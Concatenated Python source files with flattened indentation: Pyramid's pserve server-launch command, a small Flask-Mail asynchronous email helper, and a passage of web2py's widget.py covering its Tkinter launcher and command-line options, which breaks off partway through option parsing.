# http://www.opensource.org/licenses/mit-license.php
#
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
#
# Code taken also from QP: http://www.mems-exchange.org/software/qp/ From
# lib/site.py
import argparse
import os
import re
import sys
import textwrap
import threading
import time
import webbrowser
import hupper
from paste.deploy import (
loadapp,
loadserver,
)
from paste.deploy.loadwsgi import (
SERVER,
loadcontext,
)
from pyramid.compat import PY2
from pyramid.compat import configparser
from pyramid.scripts.common import parse_vars
from pyramid.scripts.common import setup_logging
from pyramid.path import AssetResolver
from pyramid.settings import aslist
def main(argv=sys.argv, quiet=False):
command = PServeCommand(argv, quiet=quiet)
return command.run()
class PServeCommand(object):
description = """\
This command serves a web application that uses a PasteDeploy
configuration file for the server and application.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
default_verbosity = 1
parser = argparse.ArgumentParser(
description=textwrap.dedent(description),
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
'-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_argument(
'-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_argument(
'--server-name',
dest='server_name',
metavar='SECTION_NAME',
help=("Use the named server as defined in the configuration file "
"(default: main)"))
parser.add_argument(
'--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_argument(
'--reload-interval',
dest='reload_interval',
default=1,
help=("Seconds between checking files (low number can cause "
"significant CPU usage)"))
parser.add_argument(
'-b', '--browser',
dest='browser',
action='store_true',
help="Open a web browser to server url")
parser.add_argument(
'-v', '--verbose',
default=default_verbosity,
dest='verbose',
action='count',
help="Set verbose level (default " + str(default_verbosity) + ")")
parser.add_argument(
'-q', '--quiet',
action='store_const',
const=0,
dest='verbose',
help="Suppress verbose output")
parser.add_argument(
'config_uri',
nargs='?',
default=None,
help='The URI to the configuration file.',
)
parser.add_argument(
'config_vars',
nargs='*',
default=(),
help="Variables required by the config file. For example, "
"`http_port=%%(http_port)s` would expect `http_port=8080` to be "
"passed here.",
)
ConfigParser = configparser.ConfigParser # testing
loadapp = staticmethod(loadapp) # testing
loadserver = staticmethod(loadserver) # testing
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
def __init__(self, argv, quiet=False):
self.args = self.parser.parse_args(argv[1:])
if quiet:
self.args.verbose = 0
if self.args.reload:
self.worker_kwargs = {'argv': argv, "quiet": quiet}
self.watch_files = []
def out(self, msg): # pragma: no cover
if self.args.verbose > 0:
print(msg)
def get_config_vars(self):
restvars = self.args.config_vars
return parse_vars(restvars)
def pserve_file_config(self, filename, global_conf=None):
here = os.path.abspath(os.path.dirname(filename))
defaults = {}
if global_conf:
defaults.update(global_conf)
defaults['here'] = here
config = self.ConfigParser(defaults=defaults)
config.optionxform = str
config.read(filename)
try:
items = dict(config.items('pserve'))
except configparser.NoSectionError:
return
watch_files = aslist(items.get('watch_files', ''), flatten=False)
# track file paths relative to the ini file
resolver = AssetResolver(package=None)
for file in watch_files:
if ':' in file:
file = resolver.resolve(file).abspath()
elif not os.path.isabs(file):
file = os.path.join(here, file)
self.watch_files.append(os.path.abspath(file))
def run(self): # pragma: no cover
if not self.args.config_uri:
self.out('You must give a config file')
return 2
app_spec = self.args.config_uri
vars = self.get_config_vars()
app_name = self.args.app_name
base = os.getcwd()
if not self._scheme_re.search(app_spec):
config_path = os.path.join(base, app_spec)
app_spec = 'config:' + app_spec
else:
config_path = None
server_name = self.args.server_name
if self.args.server:
server_spec = 'egg:pyramid'
assert server_name is None
server_name = self.args.server
else:
server_spec = app_spec
# do not open the browser on each reload so check hupper first
if self.args.browser and not hupper.is_active():
def open_browser():
context = loadcontext(
SERVER, app_spec, name=server_name, relative_to=base,
global_conf=vars)
url = 'http://127.0.0.1:{port}/'.format(**context.config())
time.sleep(1)
webbrowser.open(url)
t = threading.Thread(target=open_browser)
t.setDaemon(True)
t.start()
if self.args.reload and not hupper.is_active():
if self.args.verbose > 1:
self.out('Running reloading file monitor')
hupper.start_reloader(
'pyramid.scripts.pserve.main',
reload_interval=int(self.args.reload_interval),
verbose=self.args.verbose,
worker_kwargs=self.worker_kwargs
)
return 0
if config_path:
setup_logging(config_path, global_conf=vars)
self.pserve_file_config(config_path, global_conf=vars)
self.watch_files.append(config_path)
if hupper.is_active():
reloader = hupper.get_reloader()
reloader.watch_files(self.watch_files)
server = self.loadserver(
server_spec, name=server_name, relative_to=base, global_conf=vars)
app = self.loadapp(
app_spec, name=app_name, relative_to=base, global_conf=vars)
if self.args.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
self.out(msg)
try:
server(app)
except (SystemExit, KeyboardInterrupt) as e:
if self.args.verbose > 1:
raise
if str(e):
msg = ' ' + str(e)
else:
msg = ''
self.out('Exiting%s (-v to see traceback)' % msg)
# For paste.deploy server instantiation (egg:pyramid#wsgiref)
def wsgiref_server_runner(wsgi_app, global_conf, **kw): # pragma: no cover
from wsgiref.simple_server import make_server
host = kw.get('host', '0.0.0.0')
port = int(kw.get('port', 8080))
server = make_server(host, port, wsgi_app)
print('Starting HTTP server on http://%s:%s' % (host, port))
server.serve_forever()
# For paste.deploy server instantiation (egg:pyramid#cherrypy)
def cherrypy_server_runner(
app, global_conf=None, host='127.0.0.1', port=None,
ssl_pem=None, protocol_version=None, numthreads=None,
server_name=None, max=None, request_queue_size=None,
timeout=None
): # pragma: no cover
"""
Entry point for CherryPy's WSGI server
Serves the specified WSGI app via CherryPyWSGIServer.
``app``
The WSGI 'application callable'; multiple WSGI applications
may be passed as (script_name, callable) pairs.
``host``
This is the ipaddress to bind to (or a hostname if your
nameserver is properly configured). This defaults to
127.0.0.1, which is not a public interface.
``port``
The port to run on, defaults to 8080 for HTTP, or 4443 for
HTTPS. This can be a string or an integer value.
``ssl_pem``
This an optional SSL certificate file (via OpenSSL) You can
generate a self-signed test PEM certificate file as follows:
$ openssl genrsa 1024 > host.key
$ chmod 400 host.key
$ openssl req -new -x509 -nodes -sha1 -days 365 \\
-key host.key > host.cert
$ cat host.cert host.key > host.pem
$ chmod 400 host.pem
``protocol_version``
The protocol used by the server, by default ``HTTP/1.1``.
``numthreads``
The number of worker threads to create.
``server_name``
The string to set for WSGI's SERVER_NAME environ entry.
``max``
The maximum number of queued requests. (defaults to -1 = no
limit).
``request_queue_size``
The 'backlog' argument to socket.listen(); specifies the
maximum number of queued connections.
``timeout``
The timeout in seconds for accepted connections.
"""
is_ssl = False
if ssl_pem:
port = port or 4443
is_ssl = True
if not port:
if ':' in host:
host, port = host.split(':', 1)
else:
port = 8080
bind_addr = (host, int(port))
kwargs = {}
for var_name in ('numthreads', 'max', 'request_queue_size', 'timeout'):
var = locals()[var_name]
if var is not None:
kwargs[var_name] = int(var)
from cherrypy import wsgiserver
server = wsgiserver.CherryPyWSGIServer(bind_addr, app,
server_name=server_name, **kwargs)
if ssl_pem is not None:
if PY2:
server.ssl_certificate = server.ssl_private_key = ssl_pem
else:
# creates wsgiserver.ssl_builtin as side-effect
wsgiserver.get_ssl_adapter_class()
server.ssl_adapter = wsgiserver.ssl_builtin.BuiltinSSLAdapter(
ssl_pem, ssl_pem)
if protocol_version:
server.protocol = protocol_version
try:
protocol = is_ssl and 'https' or 'http'
if host == '0.0.0.0':
print('serving on 0.0.0.0:%s view at %s://127.0.0.1:%s' %
(port, protocol, port))
else:
print('serving on %s://%s:%s' % (protocol, host, port))
server.start()
except (KeyboardInterrupt, SystemExit):
server.stop()
return server
if __name__ == '__main__': # pragma: no cover
sys.exit(main() or 0)
|
email.py
|
# -*- coding:utf-8 -*-
# pipenv install flask-mail
from flask_mail import Mail
from flask_mail import Message
from flask import current_app, render_template
from threading import Thread
mail = Mail()
def send_async_email(app, msg):
with app.app_context():
try:
mail.send(msg)
except Exception as e:
raise e
def send_mail(to, subject, template, **kwargs):
# msg = Message('mail subject', sender='MAIL_USERNAME from the config file', body='body text', recipients=['@qq.com'])
msg = Message(subject, sender=current_app.config['MAIL_USERNAME'], recipients=[to])
msg.html = render_template(template, **kwargs)
app = current_app._get_current_object()
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
# Front-end usage: send_mail(form.email.data, 'Reset password', 'email/reset_password.html', user=user, token=user.generate_token)
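# Note: a top-level module named email.py can shadow the standard
# library's 'email' package (which smtplib, used by Flask-Mail, imports);
# renaming the file (e.g. mailer.py) sidesteps that in real projects.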
|
widget.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
The widget is called from web2py
----------------------------------
"""
from __future__ import print_function
import datetime
import sys
from gluon._compat import StringIO, thread, xrange
import time
import threading
import os
import copy
import socket
import signal
import math
import logging
import getpass
from gluon import main, newcron
from gluon.fileutils import read_file, write_file, create_welcome_w2p
from gluon.settings import global_settings
from gluon.shell import run, test
from gluon.utils import is_valid_ip_address, is_loopback_ip_address, getipaddrinfo
ProgramName = 'web2py Web Framework'
ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str(
datetime.datetime.now().year)
ProgramVersion = read_file('VERSION').strip()
ProgramInfo = '''%s
%s
%s''' % (ProgramName, ProgramAuthor, ProgramVersion)
if not sys.version[:3] in ['2.7']:
msg = 'Warning: web2py requires Python 2.7 but you are running:\n%s'
msg = msg % sys.version
sys.stderr.write(msg)
logger = logging.getLogger("web2py")
def run_system_tests(options):
"""
Runs unittests for gluon.tests
"""
import subprocess
major_version = sys.version_info[0]
minor_version = sys.version_info[1]
call_args = [sys.executable, '-m', 'unittest', '-v', 'gluon.tests']
if major_version == 2:
if minor_version in (7,):
if options.with_coverage:
try:
import coverage
coverage_config = os.environ.get(
"COVERAGE_PROCESS_START",
os.path.join('gluon', 'tests', 'coverage.ini'))
call_args = ['coverage', 'run', '--rcfile=%s' %
coverage_config,
'-m', 'unittest', '-v', 'gluon.tests']
except:
sys.stderr.write('Coverage was not installed, skipping\n')
sys.stderr.write("Python 2.7\n")
ret = subprocess.call(call_args)
else:
sys.stderr.write("unknown python 2.x version\n")
ret = 256
else:
sys.stderr.write("Experimental Python 3.x.\n")
ret = subprocess.call(call_args)
sys.exit(ret and 1)
class IO(object):
""" """
def __init__(self):
""" """
self.buffer = StringIO()
def write(self, data):
""" """
sys.__stdout__.write(data)
if hasattr(self, 'callback'):
self.callback(data)
else:
self.buffer.write(data)
def get_url(host, path='/', proto='http', port=80):
if ':' in host:
host = '[%s]' % host
else:
host = host.replace('0.0.0.0', '127.0.0.1')
if path.startswith('/'):
path = path[1:]
if proto.endswith(':'):
proto = proto[:-1]
if not port or port == 80:
port = ''
else:
port = ':%s' % port
return '%s://%s%s/%s' % (proto, host, port, path)
def start_browser(url, startup=False):
if startup:
print('please visit:')
print('\t', url)
print('starting browser...')
try:
import webbrowser
webbrowser.open(url)
except:
print('warning: unable to detect your browser')
class web2pyDialog(object):
""" Main window dialog """
def __init__(self, root, options):
""" web2pyDialog constructor """
import Tkinter
import tkMessageBox
bg_color = 'white'
root.withdraw()
self.root = Tkinter.Toplevel(root, bg=bg_color)
self.root.resizable(0, 0)
self.root.title(ProgramName)
self.options = options
self.scheduler_processes = {}
self.menu = Tkinter.Menu(self.root)
servermenu = Tkinter.Menu(self.menu, tearoff=0)
httplog = os.path.join(self.options.folder, self.options.log_filename)
iconphoto = os.path.join('extras', 'icons', 'web2py.gif')
if os.path.exists(iconphoto):
img = Tkinter.PhotoImage(file=iconphoto)
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Building the Menu
item = lambda: start_browser(httplog)
servermenu.add_command(label='View httpserver.log',
command=item)
servermenu.add_command(label='Quit (pid:%i)' % os.getpid(),
command=self.quit)
self.menu.add_cascade(label='Server', menu=servermenu)
self.pagesmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Pages', menu=self.pagesmenu)
#scheduler menu
self.schedmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Scheduler', menu=self.schedmenu)
#start and register schedulers from options
self.update_schedulers(start=True)
helpmenu = Tkinter.Menu(self.menu, tearoff=0)
# Home Page
item = lambda: start_browser('http://www.web2py.com/')
helpmenu.add_command(label='Home Page',
command=item)
# About
item = lambda: tkMessageBox.showinfo('About web2py', ProgramInfo)
helpmenu.add_command(label='About',
command=item)
self.menu.add_cascade(label='Info', menu=helpmenu)
self.root.config(menu=self.menu)
if options.taskbar:
self.root.protocol('WM_DELETE_WINDOW',
lambda: self.quit(True))
else:
self.root.protocol('WM_DELETE_WINDOW', self.quit)
sticky = Tkinter.NW
# Prepare the logo area
self.logoarea = Tkinter.Canvas(self.root,
background=bg_color,
width=300,
height=300)
self.logoarea.grid(row=0, column=0, columnspan=4, sticky=sticky)
self.logoarea.after(1000, self.update_canvas)
logo = os.path.join('extras', 'icons', 'splashlogo.gif')
if os.path.exists(logo):
img = Tkinter.PhotoImage(file=logo)
pnl = Tkinter.Label(self.logoarea, image=img, background=bg_color, bd=0)
pnl.pack(side='top', fill='both', expand='yes')
# Prevent garbage collection of img
pnl.image = img
# Prepare the banner area
self.bannerarea = Tkinter.Canvas(self.root,
bg=bg_color,
width=300,
height=300)
self.bannerarea.grid(row=1, column=1, columnspan=2, sticky=sticky)
Tkinter.Label(self.bannerarea, anchor=Tkinter.N,
text=str(ProgramVersion + "\n" + ProgramAuthor),
font=('Helvetica', 11), justify=Tkinter.CENTER,
foreground='#195866', background=bg_color,
height=3).pack(side='top',
fill='both',
expand='yes')
self.bannerarea.after(1000, self.update_canvas)
# IP
Tkinter.Label(self.root,
text='Server IP:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=4,
column=1,
sticky=sticky)
self.ips = {}
self.selected_ip = Tkinter.StringVar()
row = 4
ips = [('127.0.0.1', 'Local (IPv4)')] + \
([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \
[(ip, 'Public') for ip in options.ips] + \
[('0.0.0.0', 'Public')]
for ip, legend in ips:
self.ips[ip] = Tkinter.Radiobutton(
self.root, bg=bg_color, highlightthickness=0,
selectcolor='light grey', width=30,
anchor=Tkinter.W, text='%s (%s)' % (legend, ip),
justify=Tkinter.LEFT,
variable=self.selected_ip, value=ip)
self.ips[ip].grid(row=row, column=2, sticky=sticky)
if row == 4:
self.ips[ip].select()
row += 1
shift = row
# Port
Tkinter.Label(self.root,
text='Server Port:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=shift,
column=1, pady=10,
sticky=sticky)
self.port_number = Tkinter.Entry(self.root)
self.port_number.insert(Tkinter.END, self.options.port)
self.port_number.grid(row=shift, column=2, sticky=sticky, pady=10)
# Password
Tkinter.Label(self.root,
text='Choose Password:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=shift + 1,
column=1,
sticky=sticky)
self.password = Tkinter.Entry(self.root, show='*')
self.password.bind('<Return>', lambda e: self.start())
self.password.focus_force()
self.password.grid(row=shift + 1, column=2, sticky=sticky)
# Prepare the canvas
self.canvas = Tkinter.Canvas(self.root,
width=400,
height=100,
bg='black')
self.canvas.grid(row=shift + 2, column=1, columnspan=2, pady=5,
sticky=sticky)
self.canvas.after(1000, self.update_canvas)
# Prepare the frame
frame = Tkinter.Frame(self.root)
frame.grid(row=shift + 3, column=1, columnspan=2, pady=5,
sticky=sticky)
# Start button
self.button_start = Tkinter.Button(frame,
text='start server',
command=self.start)
self.button_start.grid(row=0, column=0, sticky=sticky)
# Stop button
self.button_stop = Tkinter.Button(frame,
text='stop server',
command=self.stop)
self.button_stop.grid(row=0, column=1, sticky=sticky)
self.button_stop.configure(state='disabled')
if options.taskbar:
import gluon.contrib.taskbar_widget
self.tb = gluon.contrib.taskbar_widget.TaskBarIcon()
self.checkTaskBar()
if options.password != '<ask>':
self.password.insert(0, options.password)
self.start()
self.root.withdraw()
else:
self.tb = None
def update_schedulers(self, start=False):
applications_folder = os.path.join(self.options.folder, 'applications')
apps = []
available_apps = [
arq for arq in os.listdir(applications_folder)
if os.path.exists(os.path.join(applications_folder, arq, 'models', 'scheduler.py'))
]
if start:
# the widget takes care of starting the scheduler
if self.options.scheduler and self.options.with_scheduler:
apps = [app.strip() for app
in self.options.scheduler.split(',')
if app in available_apps]
for app in apps:
self.try_start_scheduler(app)
# reset the menu
self.schedmenu.delete(0, len(available_apps))
for arq in available_apps:
if arq not in self.scheduler_processes:
item = lambda u = arq: self.try_start_scheduler(u)
self.schedmenu.add_command(label="start %s" % arq,
command=item)
if arq in self.scheduler_processes:
item = lambda u = arq: self.try_stop_scheduler(u)
self.schedmenu.add_command(label="stop %s" % arq,
command=item)
def start_schedulers(self, app):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
code = "from gluon.globals import current;current._scheduler.loop()"
print('starting scheduler from widget for "%s"...' % app)
args = (app, True, True, None, False, code)
logging.getLogger().setLevel(self.options.debuglevel)
p = Process(target=run, args=args)
self.scheduler_processes[app] = p
self.update_schedulers()
print("Currently running %s scheduler processes" % (
len(self.scheduler_processes)))
p.start()
print("Processes started")
def try_stop_scheduler(self, app):
if app in self.scheduler_processes:
p = self.scheduler_processes[app]
del self.scheduler_processes[app]
p.terminate()
p.join()
self.update_schedulers()
def try_start_scheduler(self, app):
if app not in self.scheduler_processes:
t = threading.Thread(target=self.start_schedulers, args=(app,))
t.start()
def checkTaskBar(self):
""" Checks taskbar status """
if self.tb.status:
if self.tb.status[0] == self.tb.EnumStatus.QUIT:
self.quit()
elif self.tb.status[0] == self.tb.EnumStatus.TOGGLE:
if self.root.state() == 'withdrawn':
self.root.deiconify()
else:
self.root.withdraw()
elif self.tb.status[0] == self.tb.EnumStatus.STOP:
self.stop()
elif self.tb.status[0] == self.tb.EnumStatus.START:
self.start()
elif self.tb.status[0] == self.tb.EnumStatus.RESTART:
self.stop()
self.start()
del self.tb.status[0]
self.root.after(1000, self.checkTaskBar)
def update(self, text):
""" Updates app text """
try:
self.text.configure(state='normal')
self.text.insert('end', text)
self.text.configure(state='disabled')
except:
pass # ## this should only happen in case app is destroyed
def connect_pages(self):
""" Connects pages """
# reset the menu
applications_folder = os.path.join(self.options.folder, 'applications')
available_apps = [
arq for arq in os.listdir(applications_folder)
if os.path.exists(os.path.join(applications_folder, arq, '__init__.py'))
]
self.pagesmenu.delete(0, len(available_apps))
for arq in available_apps:
url = self.url + arq
self.pagesmenu.add_command(
label=url, command=lambda u=url: start_browser(u))
def quit(self, justHide=False):
""" Finishes the program execution """
if justHide:
self.root.withdraw()
else:
try:
scheds = self.scheduler_processes.keys()
for t in scheds:
self.try_stop_scheduler(t)
except:
pass
try:
newcron.stopcron()
except:
pass
try:
self.server.stop()
except:
pass
try:
self.tb.Destroy()
except:
pass
self.root.destroy()
sys.exit(0)
def error(self, message):
""" Shows error message """
import tkMessageBox
tkMessageBox.showerror('web2py start server', message)
def start(self):
""" Starts web2py server """
password = self.password.get()
if not password:
self.error('no password, no web admin interface')
ip = self.selected_ip.get()
if not is_valid_ip_address(ip):
return self.error('invalid host ip address')
try:
port = int(self.port_number.get())
except:
return self.error('invalid port number')
# Check for non default value for ssl inputs
if (len(self.options.ssl_certificate) > 0 or
len(self.options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
self.url = get_url(ip, proto=proto, port=port)
self.connect_pages()
self.button_start.configure(state='disabled')
try:
options = self.options
req_queue_size = options.request_queue_size
self.server = main.HttpServer(
ip,
port,
password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=req_queue_size,
timeout=options.timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
thread.start_new_thread(self.server.start, ())
except Exception as e:
self.button_start.configure(state='normal')
return self.error(str(e))
if not self.server_ready():
self.button_start.configure(state='normal')
return
self.button_stop.configure(state='normal')
if not options.taskbar:
thread.start_new_thread(
start_browser, (get_url(ip, proto=proto, port=port), True))
self.password.configure(state='readonly')
[ip.configure(state='disabled') for ip in self.ips.values()]
self.port_number.configure(state='readonly')
if self.tb:
self.tb.SetServerRunning()
def server_ready(self):
for listener in self.server.server.listeners:
if listener.ready:
return True
return False
def stop(self):
""" Stops web2py server """
self.button_start.configure(state='normal')
self.button_stop.configure(state='disabled')
self.password.configure(state='normal')
[ip.configure(state='normal') for ip in self.ips.values()]
self.port_number.configure(state='normal')
self.server.stop()
if self.tb:
self.tb.SetServerStopped()
def update_canvas(self):
""" Updates canvas """
httplog = os.path.join(self.options.folder, self.options.log_filename)
try:
t1 = os.path.getsize(httplog)
except:
self.canvas.after(1000, self.update_canvas)
return
try:
fp = open(httplog, 'r')
fp.seek(self.t0)
data = fp.read(t1 - self.t0)
fp.close()
value = self.p0[1:] + [10 + 90.0 / math.sqrt(1 + data.count('\n'))]
self.p0 = value
for i in xrange(len(self.p0) - 1):
c = self.canvas.coords(self.q0[i])
self.canvas.coords(self.q0[i],
(c[0],
self.p0[i],
c[2],
self.p0[i + 1]))
self.t0 = t1
except BaseException:
            self.t0 = t1
self.p0 = [100] * 400
self.q0 = [self.canvas.create_line(i, 100, i + 1, 100,
fill='green') for i in xrange(len(self.p0) - 1)]
self.canvas.after(1000, self.update_canvas)
def console():
""" Defines the behavior of the console web2py execution """
import optparse
import textwrap
usage = "python web2py.py"
description = """\
web2py Web Framework startup script.
ATTENTION: unless a password is specified (-a 'passwd') web2py will
attempt to run a GUI. In this case command line options are ignored."""
description = textwrap.dedent(description)
parser = optparse.OptionParser(
usage, None, optparse.Option, ProgramVersion)
parser.description = description
msg = ('IP address of the server (e.g., 127.0.0.1 or ::1); '
'Note: This value is ignored when using the \'interfaces\' option.')
parser.add_option('-i',
'--ip',
default='127.0.0.1',
dest='ip',
help=msg)
parser.add_option('-p',
'--port',
default='8000',
dest='port',
type='int',
help='port of server (8000)')
parser.add_option('-G',
'--GAE',
default=None,
dest='gae',
help="'-G configure' will create app.yaml and gaehandler.py")
msg = ('password to be used for administration '
           '(use -a "<recycle>" to reuse the last password)')
parser.add_option('-a',
'--password',
default='<ask>',
dest='password',
help=msg)
parser.add_option('-c',
'--ssl_certificate',
default='',
dest='ssl_certificate',
help='file that contains ssl certificate')
parser.add_option('-k',
'--ssl_private_key',
default='',
dest='ssl_private_key',
help='file that contains ssl private key')
msg = ('Use this file containing the CA certificate to validate X509 '
'certificates from clients')
parser.add_option('--ca-cert',
action='store',
dest='ssl_ca_certificate',
default=None,
help=msg)
parser.add_option('-d',
'--pid_filename',
default='httpserver.pid',
dest='pid_filename',
help='file to store the pid of the server')
parser.add_option('-l',
'--log_filename',
default='httpserver.log',
dest='log_filename',
help='file to log connections')
parser.add_option('-n',
'--numthreads',
default=None,
type='int',
dest='numthreads',
help='number of threads (deprecated)')
parser.add_option('--minthreads',
default=None,
type='int',
dest='minthreads',
help='minimum number of server threads')
parser.add_option('--maxthreads',
default=None,
type='int',
dest='maxthreads',
help='maximum number of server threads')
parser.add_option('-s',
'--server_name',
default=socket.gethostname(),
dest='server_name',
help='server name for the web server')
msg = 'max number of queued requests when server unavailable'
parser.add_option('-q',
'--request_queue_size',
default='5',
type='int',
dest='request_queue_size',
help=msg)
parser.add_option('-o',
'--timeout',
default='10',
type='int',
dest='timeout',
help='timeout for individual request (10 seconds)')
parser.add_option('-z',
'--shutdown_timeout',
default='5',
type='int',
dest='shutdown_timeout',
help='timeout on shutdown of server (5 seconds)')
parser.add_option('--socket-timeout',
default=5,
type='int',
dest='socket_timeout',
                      help='timeout for socket (5 seconds)')
parser.add_option('-f',
'--folder',
default=os.getcwd(),
dest='folder',
help='folder from which to run web2py')
parser.add_option('-v',
'--verbose',
action='store_true',
dest='verbose',
default=False,
help='increase --test verbosity')
parser.add_option('-Q',
'--quiet',
action='store_true',
dest='quiet',
default=False,
help='disable all output')
parser.add_option('-e',
'--errors_to_console',
action='store_true',
dest='print_errors',
default=False,
help='log all errors to console')
msg = ('set debug output level (0-100, 0 means all, 100 means none; '
'default is 30)')
parser.add_option('-D',
'--debug',
dest='debuglevel',
default=30,
type='int',
help=msg)
msg = ('run web2py in interactive shell or IPython (if installed) with '
'specified appname (if app does not exist it will be created). '
'APPNAME like a/c/f (c,f optional)')
parser.add_option('-S',
'--shell',
dest='shell',
metavar='APPNAME',
help=msg)
msg = ('run web2py in interactive shell or bpython (if installed) with '
'specified appname (if app does not exist it will be created).\n'
'Use combined with --shell')
parser.add_option('-B',
'--bpython',
action='store_true',
default=False,
dest='bpython',
help=msg)
msg = 'only use plain python shell; should be used with --shell option'
parser.add_option('-P',
'--plain',
action='store_true',
default=False,
dest='plain',
help=msg)
msg = ('auto import model files; default is False; should be used '
'with --shell option')
parser.add_option('-M',
'--import_models',
action='store_true',
default=False,
dest='import_models',
help=msg)
msg = ('run PYTHON_FILE in web2py environment; '
'should be used with --shell option')
parser.add_option('-R',
'--run',
dest='run',
metavar='PYTHON_FILE',
default='',
help=msg)
msg = ('run scheduled tasks for the specified apps: expects a list of '
'app names as -K app1,app2,app3 '
'or a list of app:groups as -K app1:group1:group2,app2:group1 '
'to override specific group_names. (only strings, no spaces '
           'allowed). Requires a scheduler defined in the models')
parser.add_option('-K',
'--scheduler',
dest='scheduler',
default=None,
help=msg)
msg = 'run schedulers alongside webserver, needs -K app1 and -a too'
parser.add_option('-X',
'--with-scheduler',
action='store_true',
default=False,
dest='with_scheduler',
help=msg)
msg = ('run doctests in web2py environment; '
'TEST_PATH like a/c/f (c,f optional)')
parser.add_option('-T',
'--test',
dest='test',
metavar='TEST_PATH',
default=None,
help=msg)
msg = 'trigger a cron run manually; usually invoked from a system crontab'
parser.add_option('-C',
'--cron',
action='store_true',
dest='extcron',
default=False,
help=msg)
msg = 'triggers the use of softcron'
parser.add_option('--softcron',
action='store_true',
dest='softcron',
default=False,
help=msg)
parser.add_option('-Y',
'--run-cron',
action='store_true',
dest='runcron',
default=False,
help='start the background cron process')
parser.add_option('-J',
'--cronjob',
action='store_true',
dest='cronjob',
default=False,
help='identify cron-initiated command')
parser.add_option('-L',
'--config',
dest='config',
default='',
help='config file')
parser.add_option('-F',
'--profiler',
dest='profiler_dir',
default=None,
help='profiler dir')
parser.add_option('-t',
'--taskbar',
action='store_true',
dest='taskbar',
default=False,
help='use web2py gui and run in taskbar (system tray)')
parser.add_option('',
'--nogui',
action='store_true',
default=False,
dest='nogui',
help='text-only, no GUI')
msg = ('should be followed by a list of arguments to be passed to script, '
'to be used with -S, -A must be the last option')
parser.add_option('-A',
'--args',
action='store',
dest='args',
default=None,
help=msg)
parser.add_option('--no-banner',
action='store_true',
default=False,
dest='nobanner',
help='Do not print header banner')
msg = ('listen on multiple addresses: '
'"ip1:port1:key1:cert1:ca_cert1;ip2:port2:key2:cert2:ca_cert2;..." '
'(:key:cert:ca_cert optional; no spaces; IPv6 addresses must be in '
'square [] brackets)')
parser.add_option('--interfaces',
action='store',
dest='interfaces',
default=None,
help=msg)
msg = 'runs web2py tests'
parser.add_option('--run_system_tests',
action='store_true',
dest='run_system_tests',
default=False,
help=msg)
msg = ('adds coverage reporting (needs --run_system_tests), '
'python 2.7 and the coverage module installed. '
'You can alter the default path setting the environmental '
'var "COVERAGE_PROCESS_START". '
'By default it takes gluon/tests/coverage.ini')
parser.add_option('--with_coverage',
action='store_true',
dest='with_coverage',
default=False,
help=msg)
if '-A' in sys.argv:
k = sys.argv.index('-A')
elif '--args' in sys.argv:
k = sys.argv.index('--args')
else:
k = len(sys.argv)
sys.argv, other_args = sys.argv[:k], sys.argv[k + 1:]
(options, args) = parser.parse_args()
options.args = [options.run] + other_args
copy_options = copy.deepcopy(options)
copy_options.password = '******'
global_settings.cmd_options = copy_options
global_settings.cmd_args = args
if options.gae:
if not os.path.exists('app.yaml'):
name = raw_input("Your GAE app name: ")
content = open(os.path.join('examples', 'app.example.yaml'), 'rb').read()
open('app.yaml', 'wb').write(content.replace("yourappname", name))
else:
            print("app.yaml already exists in the web2py folder")
if not os.path.exists('gaehandler.py'):
content = open(os.path.join('handlers', 'gaehandler.py'), 'rb').read()
open('gaehandler.py', 'wb').write(content)
else:
            print("gaehandler.py already exists in the web2py folder")
sys.exit(0)
try:
options.ips = list(set( # no duplicates
[addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn())
if not is_loopback_ip_address(addrinfo=addrinfo)]))
except socket.gaierror:
options.ips = []
if options.run_system_tests:
run_system_tests(options)
if options.quiet:
capture = StringIO()
sys.stdout = capture
logger.setLevel(logging.CRITICAL + 1)
else:
logger.setLevel(options.debuglevel)
if options.config[-3:] == '.py':
options.config = options.config[:-3]
if options.cronjob:
global_settings.cronjob = True # tell the world
options.plain = True # cronjobs use a plain shell
options.nobanner = True
options.nogui = True
options.folder = os.path.abspath(options.folder)
# accept --interfaces in the form
# "ip1:port1:key1:cert1:ca_cert1;[ip2]:port2;ip3:port3:key3:cert3"
# (no spaces; optional key:cert indicate SSL)
if isinstance(options.interfaces, str):
interfaces = options.interfaces.split(';')
options.interfaces = []
for interface in interfaces:
if interface.startswith('['): # IPv6
ip, if_remainder = interface.split(']', 1)
ip = ip[1:]
if_remainder = if_remainder[1:].split(':')
if_remainder[0] = int(if_remainder[0]) # numeric port
options.interfaces.append(tuple([ip] + if_remainder))
else: # IPv4
interface = interface.split(':')
interface[1] = int(interface[1]) # numeric port
